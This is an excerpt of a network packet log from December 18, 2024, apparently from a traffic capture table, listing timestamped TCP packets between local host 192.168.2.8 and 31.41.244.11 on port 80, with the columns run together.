                                                                                                                                                                                          Dec 18, 2024 09:07:30.993792057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993803978 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993833065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993882895 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993894100 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993937016 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993998051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.994082928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.996625900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.996675014 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.996818066 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.996861935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.997706890 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.997751951 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.997889042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.997930050 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.998204947 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.998245955 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.998658895 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.998701096 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.999346972 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.999380112 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.999424934 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.000338078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.000480890 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.000513077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.000530005 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.001377106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.001549959 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.001591921 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.002401114 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.002412081 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.002444983 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.002456903 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.003367901 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.003483057 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.003515005 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.003552914 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.004266024 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.004303932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.004452944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.004597902 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.005387068 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.005420923 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.005574942 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.005606890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.006438971 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.006475925 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.006783962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.006817102 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.007412910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.007448912 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.007554054 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.007591009 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.008466005 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.008513927 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.008658886 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.008697987 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.009392977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.009572029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.009620905 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.010492086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.010603905 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.010627985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.010668039 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.011358023 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.011398077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.011523008 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.011667967 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.012461901 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.012485027 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.012502909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.012518883 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.013458967 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.013771057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.013811111 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.014468908 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.014630079 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.014667034 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.015316963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.015372992 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.015887976 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.015923023 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.016566038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.016612053 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.016710043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.016798973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.017462015 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.017541885 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.017616987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.017662048 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.018450022 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.018501997 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.018605947 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.018721104 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.019685984 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.019709110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.019723892 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.019746065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020328045 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020338058 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020358086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020368099 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020375013 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020395994 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.020416021 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.021246910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.021281958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.021399975 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.021445036 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.022238970 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.022289038 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.022509098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.022546053 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.023350000 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.023389101 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.023483038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.024292946 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.024333000 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.024410963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.024446964 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.025291920 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.025338888 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.025371075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.025414944 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.026292086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.026369095 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.026407003 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.027324915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.027367115 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.027441025 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.027934074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.028321028 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.028357029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.028434992 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.028471947 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.029290915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.029326916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.029407024 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.029448986 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.030437946 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.030489922 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.030566931 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.030605078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.031389952 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.031434059 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.031619072 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.031656981 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.032305956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.032350063 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.170603991 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.170660973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.170743942 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.170953989 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.171147108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.171283960 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.171901941 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.172056913 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.172096014 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.172847986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.172898054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.172974110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.173018932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.173877954 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.173933029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.173993111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.174088955 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.174949884 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.175025940 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.175040007 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.175075054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.175995111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.176032066 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.176172018 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.176419973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.176923037 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.176971912 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.177020073 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.177129984 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.178073883 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.178347111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.178392887 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.179095030 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.179250956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.179292917 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.179964066 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.180007935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.180083036 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.181010962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.181056976 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.181126118 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.182013035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.182050943 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.182075977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.183005095 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.183042049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.183136940 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.183171988 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.184020042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.184112072 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.184145927 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.185017109 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.185136080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.185170889 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.186033010 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.186073065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.186142921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.187052011 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.187092066 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.187249899 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.187474012 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.188038111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.188384056 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.188443899 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.189052105 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.189178944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.189222097 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.190143108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.190192938 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.190213919 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.191126108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.191139936 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.191178083 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.191211939 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.192095995 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.192320108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.192401886 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.193100929 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.193206072 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.193254948 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.194123030 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.194171906 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.194231987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.195128918 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.195172071 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.195230961 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.195473909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.196135998 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.196289062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.196325064 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.197143078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.197382927 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.197418928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.198165894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.198203087 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.198267937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.199197054 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.199235916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.199301004 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.199471951 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.200206041 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.200339079 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.200376987 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.201359987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.201472044 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.201517105 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.202224970 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.202269077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.202354908 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.203242064 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.203289032 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.203347921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.203474045 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.204256058 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.204372883 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.204417944 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.205370903 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.205579996 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.205626965 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.206269979 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.206314087 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.206422091 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.207304001 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.207346916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.207350969 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.207472086 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.208302021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.208391905 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.208431959 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.209287882 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.209391117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.209429026 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.210321903 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.210361004 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.210424900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.211338997 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.211385965 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.211457014 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.212362051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.212403059 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.212450981 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.212485075 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.213387966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.213445902 CET804972031.41.244.11192.168.2.8
